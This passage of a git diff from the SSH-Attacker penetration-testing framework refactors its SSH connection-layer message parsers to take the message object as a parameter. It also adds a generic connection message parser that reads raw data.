b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExecMessageParser.java index 64875b4c9..445f7d83b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExecMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExecMessageParser.java @@ -33,15 +33,17 @@ public ChannelRequestExecMessageParser(InputStream stream) { @Override public void parse(ChannelRequestExecMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } - @Override - public ChannelRequestExecMessage createMessage() { - return new ChannelRequestExecMessage(); - } + /* + @Override + public ChannelRequestExecMessage createMessage() { + return new ChannelRequestExecMessage(); + } + */ - public void parseCommand() { + public void parseCommand(ChannelRequestExecMessage message) { message.setCommandLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Command length: " + message.getCommandLength().getValue()); message.setCommand(parseByteString(message.getCommandLength().getValue())); @@ -49,8 +51,8 @@ public void parseCommand() { } @Override - protected void parseMessageSpecificContents() { - super.parseMessageSpecificContents(); - parseCommand(); + protected void parseMessageSpecificContents(ChannelRequestExecMessage message) { + super.parseMessageSpecificContents(message); + parseCommand(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExitSignalMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExitSignalMessageParser.java index 6ef1918ce..4fea2f142 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExitSignalMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExitSignalMessageParser.java @@ -36,27 +36,29 @@ public ChannelRequestExitSignalMessageParser(InputStream stream) { @Override public void parse(ChannelRequestExitSignalMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } - @Override - public ChannelRequestExitSignalMessage createMessage() { - return new ChannelRequestExitSignalMessage(); - } + /* + @Override + public ChannelRequestExitSignalMessage createMessage() { + return new ChannelRequestExitSignalMessage(); + } + */ - public void parseSignalName() { + public void parseSignalName(ChannelRequestExitSignalMessage message) { message.setSignalNameLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Signal name length: " + message.getSignalNameLength().getValue()); message.setSignalName(parseByteString(message.getSignalNameLength().getValue())); LOGGER.debug("Signal name: {}", backslashEscapeString(message.getSignalName().getValue())); } - public void parseCoreDump() { + public void parseCoreDump(ChannelRequestExitSignalMessage message) { message.setCoreDump(false); LOGGER.debug("Core dumped: " + message.getCoreDump().getValue()); } - public void parseErrorMessage() { + public void parseErrorMessage(ChannelRequestExitSignalMessage message) { message.setErrorMessageLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Error message length: {}", message.getErrorMessageLength().getValue()); message.setErrorMessage(parseByteString(message.getErrorMessageLength().getValue())); @@ -64,7 +66,7 @@ public void parseErrorMessage() { "Error message: {}", backslashEscapeString(message.getErrorMessage().getValue())); } - private void parseLanguageTag() { + private void parseLanguageTag(ChannelRequestExitSignalMessage message) { message.setLanguageTagLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Language tag length: " + message.getLanguageTagLength().getValue()); message.setLanguageTag( @@ -75,11 +77,11 @@ private void parseLanguageTag() { } @Override - protected void parseMessageSpecificContents() { - super.parseMessageSpecificContents(); - parseSignalName(); - parseCoreDump(); - parseErrorMessage(); - parseLanguageTag(); + protected void parseMessageSpecificContents(ChannelRequestExitSignalMessage message) { + super.parseMessageSpecificContents(message); + parseSignalName(message); + parseCoreDump(message); + parseErrorMessage(message); + parseLanguageTag(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExitStatusMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExitStatusMessageParser.java index e10ca354c..73a147e1c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExitStatusMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExitStatusMessageParser.java @@ -34,21 +34,21 @@ public ChannelRequestExitStatusMessageParser(InputStream stream) { @Override public void parse(ChannelRequestExitStatusMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } - @Override + /*@Override public ChannelRequestExitStatusMessage createMessage() { return new ChannelRequestExitStatusMessage(); - } + }*/ - public void parseExitStatus() { + public void parseExitStatus(ChannelRequestExitStatusMessage message) { message.setExitStatus(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug("Exit status: " + message.getExitStatus().getValue()); } - public void parseMessageSpecificContents() { - super.parseMessageSpecificContents(); - parseExitStatus(); + public void parseMessageSpecificContents(ChannelRequestExitStatusMessage message) { + super.parseMessageSpecificContents(message); + parseExitStatus(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestMessageParser.java index 6a098d48b..5905891b2 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestMessageParser.java @@ -33,7 +33,7 @@ public ChannelRequestMessageParser(InputStream stream) { super(stream); } - private void parseRequestType() { + private void parseRequestType(T message) { message.setRequestTypeLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Request type length: " + message.getRequestTypeLength().getValue()); message.setRequestType( @@ -42,15 +42,15 @@ private void parseRequestType() { LOGGER.debug("Request type: " + message.getRequestType().getValue()); } - private void parseWantReply() { + private void parseWantReply(T message) { message.setWantReply(parseByteField(1)); LOGGER.debug("Reply wanted: " + Converter.byteToBoolean(message.getWantReply().getValue())); } @Override - protected void parseMessageSpecificContents() { - super.parseMessageSpecificContents(); - parseRequestType(); - parseWantReply(); + protected void parseMessageSpecificContents(T message) { + super.parseMessageSpecificContents(message); + parseRequestType(message); + parseWantReply(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestPtyMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestPtyMessageParser.java index 43900679e..ecf23dacc 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestPtyMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestPtyMessageParser.java @@ -32,15 +32,17 @@ public ChannelRequestPtyMessageParser(InputStream stream) { @Override public void parse(ChannelRequestPtyMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } - @Override - public ChannelRequestPtyMessage createMessage() { - return new ChannelRequestPtyMessage(); - } + /* + @Override + public ChannelRequestPtyMessage createMessage() { + return new ChannelRequestPtyMessage(); + } + */ - public void parseTermEnvVariable() { + public void parseTermEnvVariable(ChannelRequestPtyMessage message) { message.setTermEnvVariableLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug( "TERM environment variable length: " @@ -49,27 +51,27 @@ public void parseTermEnvVariable() { LOGGER.debug("TERM environment variable: " + message.getTermEnvVariable().getValue()); } - public void parseWidthCharacters() { + public void parseWidthCharacters(ChannelRequestPtyMessage message) { message.setWidthCharacters(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug("Terminal width in characters: " + message.getWidthCharacters().getValue()); } - public void parseHeightRows() { + public void parseHeightRows(ChannelRequestPtyMessage message) { message.setHeightRows(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug("Terminal height in rows: " + message.getHeightRows().getValue()); } - public void parseWidthPixels() { + public void parseWidthPixels(ChannelRequestPtyMessage message) { message.setWidthPixels(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug("Terminal width in pixels: " + message.getWidthPixels().getValue()); } - public void parseHeightPixels() { + public void parseHeightPixels(ChannelRequestPtyMessage message) { message.setHeightPixels(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug("Terminal height in pixels: " + message.getHeightPixels().getValue()); } - public void parseEncodedTerminalModes() { + public void parseEncodedTerminalModes(ChannelRequestPtyMessage message) { message.setEncodedTerminalModesLength( parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug( @@ -84,13 +86,13 @@ public void parseEncodedTerminalModes() { } @Override - protected void parseMessageSpecificContents() { - super.parseMessageSpecificContents(); - parseTermEnvVariable(); - parseWidthCharacters(); - parseHeightRows(); - parseWidthPixels(); - parseHeightPixels(); - parseEncodedTerminalModes(); + protected void parseMessageSpecificContents(ChannelRequestPtyMessage message) { + super.parseMessageSpecificContents(message); + parseTermEnvVariable(message); + parseWidthCharacters(message); + parseHeightRows(message); + parseWidthPixels(message); + parseHeightPixels(message); + parseEncodedTerminalModes(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestShellMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestShellMessageParser.java index 48f0ff5fb..40b7bcd13 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestShellMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestShellMessageParser.java @@ -25,11 +25,11 @@ public ChannelRequestShellMessageParser(InputStream stream) { @Override public void parse(ChannelRequestShellMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } - @Override + /* @Override public ChannelRequestShellMessage createMessage() { return new ChannelRequestShellMessage(); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestSignalMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestSignalMessageParser.java index 15f524ef4..75ea4e314 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestSignalMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestSignalMessageParser.java @@ -33,15 +33,17 @@ public ChannelRequestSignalMessageParser(InputStream stream) { @Override public void parse(ChannelRequestSignalMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } - @Override - public ChannelRequestSignalMessage createMessage() { - return new ChannelRequestSignalMessage(); - } + /* + @Override + public ChannelRequestSignalMessage createMessage() { + return new ChannelRequestSignalMessage(); + } + */ - public void parseSignalName() { + public void parseSignalName(ChannelRequestSignalMessage message) { message.setSignalNameLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Signal name length: " + message.getSignalNameLength().getValue()); message.setSignalName(parseByteString(message.getSignalNameLength().getValue())); @@ -49,8 +51,8 @@ public void parseSignalName() { } @Override - protected void parseMessageSpecificContents() { - super.parseMessageSpecificContents(); - parseSignalName(); + protected void parseMessageSpecificContents(ChannelRequestSignalMessage message) { + super.parseMessageSpecificContents(message); + parseSignalName(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestSubsystemMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestSubsystemMessageParser.java index e57c03fa5..31124a903 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestSubsystemMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestSubsystemMessageParser.java @@ -35,15 +35,17 @@ public ChannelRequestSubsystemMessageParser(InputStream stream) { @Override public void parse(ChannelRequestSubsystemMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } - @Override - public ChannelRequestSubsystemMessage createMessage() { - return new ChannelRequestSubsystemMessage(); - } + /* + @Override + public ChannelRequestSubsystemMessage createMessage() { + return new ChannelRequestSubsystemMessage(); + } + */ - public void parseSubsystemName() { + public void parseSubsystemName(ChannelRequestSubsystemMessage message) { message.setSubsystemNameLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Subsystem name length: " + message.getSubsystemNameLength().getValue()); message.setSubsystemName( @@ -54,8 +56,8 @@ public void parseSubsystemName() { } @Override - protected void parseMessageSpecificContents() { - super.parseMessageSpecificContents(); - parseSubsystemName(); + protected void parseMessageSpecificContents(ChannelRequestSubsystemMessage message) { + super.parseMessageSpecificContents(message); + parseSubsystemName(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestUnknownMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestUnknownMessageParser.java index 6eaa48bce..9f5f18f65 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestUnknownMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestUnknownMessageParser.java @@ -32,15 +32,17 @@ public ChannelRequestUnknownMessageParser(InputStream stream) { @Override public void parse(ChannelRequestUnknownMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } - @Override - public ChannelRequestUnknownMessage createMessage() { - return new ChannelRequestUnknownMessage(); - } + /* + @Override + public ChannelRequestUnknownMessage createMessage() { + return new ChannelRequestUnknownMessage(); + } + */ - public void parseTypeSpecificData() { + public void parseTypeSpecificData(ChannelRequestUnknownMessage message) { message.setTypeSpecificData(parseByteArrayField(getBytesLeft())); LOGGER.debug( "Type specific data: " @@ -49,8 +51,8 @@ public void parseTypeSpecificData() { } @Override - protected void parseMessageSpecificContents() { - super.parseMessageSpecificContents(); - parseTypeSpecificData(); + protected void parseMessageSpecificContents(ChannelRequestUnknownMessage message) { + super.parseMessageSpecificContents(message); + parseTypeSpecificData(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestWindowChangeMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestWindowChangeMessageParser.java index a69ec62e1..b4a9f55ae 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestWindowChangeMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestWindowChangeMessageParser.java @@ -33,40 +33,42 @@ public ChannelRequestWindowChangeMessageParser(InputStream stream) { @Override public void parse(ChannelRequestWindowChangeMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } - @Override - public ChannelRequestWindowChangeMessage createMessage() { - return new ChannelRequestWindowChangeMessage(); - } + /* + @Override + public ChannelRequestWindowChangeMessage createMessage() { + return new ChannelRequestWindowChangeMessage(); + } + */ - public void parseWidthColumns() { + public void parseWidthColumns(ChannelRequestWindowChangeMessage message) { message.setWidthColumns(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug("Terminal width in colums: " + message.getWidthColumns().getValue()); } - public void parseHeightRows() { + public void parseHeightRows(ChannelRequestWindowChangeMessage message) { message.setHeightRows(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug("Terminal height in rows: " + message.getHeightRows().getValue()); } - public void parseWidthPixels() { + public void parseWidthPixels(ChannelRequestWindowChangeMessage message) { message.setWidthPixels(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug("Terminal width in pixels: " + message.getWidthPixels().getValue()); } - public void parseHeightPixels() { + public void parseHeightPixels(ChannelRequestWindowChangeMessage message) { message.setHeightPixels(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug("Terminal height in pixels: " + message.getHeightPixels().getValue()); } @Override - protected void parseMessageSpecificContents() { - super.parseMessageSpecificContents(); - parseWidthColumns(); - parseHeightRows(); - parseWidthPixels(); - parseHeightPixels(); + protected void parseMessageSpecificContents(ChannelRequestWindowChangeMessage message) { + super.parseMessageSpecificContents(message); + parseWidthColumns(message); + parseHeightRows(message); + parseWidthPixels(message); + parseHeightPixels(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestX11MessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestX11MessageParser.java index 7f46f5718..38e842fcb 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestX11MessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestX11MessageParser.java @@ -33,19 +33,21 @@ public ChannelRequestX11MessageParser(InputStream stream) { super(stream); } - @Override - public ChannelRequestX11Message createMessage() { - return new ChannelRequestX11Message(); - } + /* + @Override + public ChannelRequestX11Message createMessage() { + return new ChannelRequestX11Message(); + } + */ - public void parseSingleConnection() { + public void parseSingleConnection(ChannelRequestX11Message message) { message.setSingleConnection(parseByteField(1)); LOGGER.debug( "Single connection: " + Converter.byteToBoolean(message.getSingleConnection().getValue())); } - public void parseX11AuthenticationProtocol() { + public void parseX11AuthenticationProtocol(ChannelRequestX11Message message) { message.setX11AuthenticationProtocolLength( parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug( @@ -60,7 +62,7 @@ public void parseX11AuthenticationProtocol() { + message.getX11AuthenticationProtocol().getValue()); } - public void parseX11AuthenticationCookie() { + public void parseX11AuthenticationCookie(ChannelRequestX11Message message) { message.setX11AuthenticationCookieLength( parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug( @@ -73,22 +75,22 @@ public void parseX11AuthenticationCookie() { "X11 authentication cookie: " + message.getX11AuthenticationCookie().getValue()); } - public void parseX11ScreenNumber() { + public void parseX11ScreenNumber(ChannelRequestX11Message message) { message.setX11ScreenNumber(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug("X11 screen number: " + message.getX11ScreenNumber().getValue()); } @Override - protected void parseMessageSpecificContents() { - super.parseMessageSpecificContents(); - parseSingleConnection(); - parseX11AuthenticationProtocol(); - parseX11AuthenticationCookie(); - parseX11ScreenNumber(); + protected void parseMessageSpecificContents(ChannelRequestX11Message message) { + super.parseMessageSpecificContents(message); + parseSingleConnection(message); + parseX11AuthenticationProtocol(message); + parseX11AuthenticationCookie(message); + parseX11ScreenNumber(message); } @Override public void parse(ChannelRequestX11Message message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestXonXoffMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestXonXoffMessageParser.java index 6b824a2ae..c71246234 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestXonXoffMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestXonXoffMessageParser.java @@ -33,15 +33,17 @@ public ChannelRequestXonXoffMessageParser(InputStream stream) { @Override public void parse(ChannelRequestXonXoffMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } - @Override - public ChannelRequestXonXoffMessage createMessage() { - return new ChannelRequestXonXoffMessage(); - } + /* + @Override + public ChannelRequestXonXoffMessage createMessage() { + return new ChannelRequestXonXoffMessage(); + } + */ - private void parseClientFlowControl() { + private void parseClientFlowControl(ChannelRequestXonXoffMessage message) { message.setClientFlowControl(parseByteField(1)); LOGGER.debug( "Client can do flow control: " @@ -49,8 +51,8 @@ private void parseClientFlowControl() { } @Override - protected void parseMessageSpecificContents() { - super.parseMessageSpecificContents(); - parseClientFlowControl(); + protected void parseMessageSpecificContents(ChannelRequestXonXoffMessage message) { + super.parseMessageSpecificContents(message); + parseClientFlowControl(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelSuccessMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelSuccessMessageParser.java index bdbbdb82d..d287a66bb 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelSuccessMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelSuccessMessageParser.java @@ -28,11 +28,11 @@ public ChannelSuccessMessageParser(InputStream stream) { @Override public void parse(ChannelSuccessMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } - @Override + /* @Override public ChannelSuccessMessage createMessage() { return new ChannelSuccessMessage(); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelWindowAdjustMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelWindowAdjustMessageParser.java index aba08e2cf..7dad15804 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelWindowAdjustMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelWindowAdjustMessageParser.java @@ -33,22 +33,24 @@ public ChannelWindowAdjustMessageParser(InputStream stream) { @Override public void parse(ChannelWindowAdjustMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } - @Override - public ChannelWindowAdjustMessage createMessage() { - return new ChannelWindowAdjustMessage(); - } + /* + @Override + public ChannelWindowAdjustMessage createMessage() { + return new ChannelWindowAdjustMessage(); + } + */ - private void parseBytesToAdd() { + private void parseBytesToAdd(ChannelWindowAdjustMessage message) { message.setBytesToAdd(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug("Bytes to add: " + message.getBytesToAdd().getValue()); } @Override - protected void parseMessageSpecificContents() { - super.parseMessageSpecificContents(); - parseBytesToAdd(); + protected void parseMessageSpecificContents(ChannelWindowAdjustMessage message) { + super.parseMessageSpecificContents(message); + parseBytesToAdd(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ConnectionMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ConnectionMessageParser.java new file mode 100644 index 000000000..97780038b --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ConnectionMessageParser.java @@ -0,0 +1,45 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.connection.parser; + +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.message.ConnectionMessage; +import java.io.InputStream; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class ConnectionMessageParser extends ProtocolMessageParser { + + private static final Logger LOGGER = LogManager.getLogger(); + + /** + * Constructor for the Parser class + * + * @param stream + */ + public ConnectionMessageParser(InputStream stream) { + super(stream); + } + + @Override + public void parse(ConnectionMessage message) { + LOGGER.debug("Parsing ApplicationMessage"); + parseData(message); + message.setCompleteResultingMessage(getAlreadyParsed()); + } + + /** + * Reads the next bytes as the Data and writes them in the message + * + * @param msg Message to write in + */ + private void parseData(ConnectionMessage msg) { + msg.setData(parseByteArrayField(getBytesLeft())); + LOGGER.debug("Data: {}", msg.getData().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestCancelTcpIpForwardMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestCancelTcpIpForwardMessageParser.java index 4b5edce64..59f7c2634 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestCancelTcpIpForwardMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestCancelTcpIpForwardMessageParser.java @@ -32,10 +32,10 @@ public GlobalRequestCancelTcpIpForwardMessageParser(InputStream stream) { @Override public void parse(GlobalRequestCancelTcpIpForwardMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } - private void parseIPAddressToBind() { + private void parseIPAddressToBind(GlobalRequestCancelTcpIpForwardMessage message) { message.setIpAddressToBindLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("IP address to bind length: " + message.getIpAddressToBindLength().getValue()); message.setIpAddressToBind( @@ -44,20 +44,20 @@ private void parseIPAddressToBind() { LOGGER.debug("IP address to bind: " + message.getIpAddressToBind().getValue()); } - private void parsePortToBind() { + private void parsePortToBind(GlobalRequestCancelTcpIpForwardMessage message) { message.setPortToBind(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Port to bind: " + message.getPortToBind().getValue()); } - @Override + /* @Override public GlobalRequestCancelTcpIpForwardMessage createMessage() { return new GlobalRequestCancelTcpIpForwardMessage(); - } + }*/ @Override - protected void parseMessageSpecificContents() { - super.parseMessageSpecificContents(); - parseIPAddressToBind(); - parsePortToBind(); + protected void parseMessageSpecificContents(GlobalRequestCancelTcpIpForwardMessage message) { + super.parseMessageSpecificContents(message); + parseIPAddressToBind(message); + parsePortToBind(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestFailureMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestFailureMessageParser.java index a1313cbc5..75255289c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestFailureMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestFailureMessageParser.java @@ -29,14 +29,16 @@ public GlobalRequestFailureMessageParser(InputStream stream) { @Override public void parse(GlobalRequestFailureMessage globalRequestFailureMessage) { - parseMessageSpecificContents(); + parseMessageSpecificContents(globalRequestFailureMessage); } - @Override - public GlobalRequestFailureMessage createMessage() { - return new GlobalRequestFailureMessage(); - } + /* + @Override + public GlobalRequestFailureMessage createMessage() { + return new GlobalRequestFailureMessage(); + } + */ @Override - protected void parseMessageSpecificContents() {} + protected void parseMessageSpecificContents(GlobalRequestFailureMessage message) {} } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestMessageParser.java index 9eb187b52..1112d00dd 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestMessageParser.java @@ -36,7 +36,7 @@ public GlobalRequestMessageParser(InputStream stream) { super(stream); } - private void parseRequestName() { + private void parseRequestName(T message) { message.setRequestNameLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Request name length: " + message.getRequestNameLength().getValue()); message.setRequestName( @@ -46,14 +46,14 @@ private void parseRequestName() { "Request name: {}", backslashEscapeString(message.getRequestName().getValue())); } - private void parseWantReply() { + private void parseWantReply(T message) { message.setWantReply(parseByteField(1)); LOGGER.debug("Want reply: " + Converter.byteToBoolean(message.getWantReply().getValue())); } @Override - protected void parseMessageSpecificContents() { - parseRequestName(); - parseWantReply(); + protected void parseMessageSpecificContents(T message) { + parseRequestName(message); + parseWantReply(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestNoMoreSessionsMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestNoMoreSessionsMessageParser.java index c98bcdbb4..cb1eb9f27 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestNoMoreSessionsMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestNoMoreSessionsMessageParser.java @@ -28,16 +28,18 @@ public GlobalRequestNoMoreSessionsMessageParser(InputStream stream) { @Override public void parse(GlobalRequestNoMoreSessionsMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } - @Override - public GlobalRequestNoMoreSessionsMessage createMessage() { - return new GlobalRequestNoMoreSessionsMessage(); - } + /* + @Override + public GlobalRequestNoMoreSessionsMessage createMessage() { + return new GlobalRequestNoMoreSessionsMessage(); + } + */ @Override - protected void parseMessageSpecificContents() { - super.parseMessageSpecificContents(); + protected void parseMessageSpecificContents(GlobalRequestNoMoreSessionsMessage message) { + super.parseMessageSpecificContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestOpenSshHostKeysMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestOpenSshHostKeysMessageParser.java index c1204a062..9c64e5bbe 100644 